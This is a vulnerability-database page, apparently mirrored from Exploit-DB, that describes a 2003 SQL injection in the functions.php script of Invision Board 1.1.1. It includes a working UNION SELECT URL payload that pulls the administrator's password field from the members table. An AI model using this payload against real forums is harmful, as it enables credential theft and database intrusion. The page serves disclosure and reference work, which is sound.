Invision Board 1.1.1 – ‘functions.php’ SQL Injection

Invision Board 1.1.1 – ‘functions.php’ SQL Injection

漏洞ID 1053811 漏洞类型
发布时间 2003-04-05 更新时间 2003-04-05
图片[1]-Invision Board 1.1.1 – ‘functions.php’ SQL Injection-安全小百科CVE编号 N/A
图片[2]-Invision Board 1.1.1 – ‘functions.php’ SQL Injection-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22461
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7290/info

An input validation error has been reported in Invision Board which may result in the manipulation of SQL queries. This vulnerability exists in the functions.php script file.

An attacker may be able to exploit this vulnerability by manipulating some URI parameter to include malicious SQL commands and queries which may result in information disclosure, or database corruption. 

http://www.example.com/index.php?skinid=99+AND+s.hidden%3D0+UNION+SELECT+s.*%2C+t.template%2C+c.password+FROM+ibf_skins+s+LEFT+JOIN+ibf_templates+t+ON+%28t.tmid%3Ds.tmpl_id%
29+LEFT+JOIN+ibf_members+c+ON+%28c.id%3D1%29+WHERE+s.sid%3D1+AND+s.hidden%3D0

相关推荐: Oracle Oracle9iAS Web Cache HTTP Header DoS Vulnerability

Oracle Oracle9iAS Web Cache HTTP Header DoS Vulnerability 漏洞ID 1102826 漏洞类型 Failure to Handle Exceptional Conditions 发布时间 2001-10-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享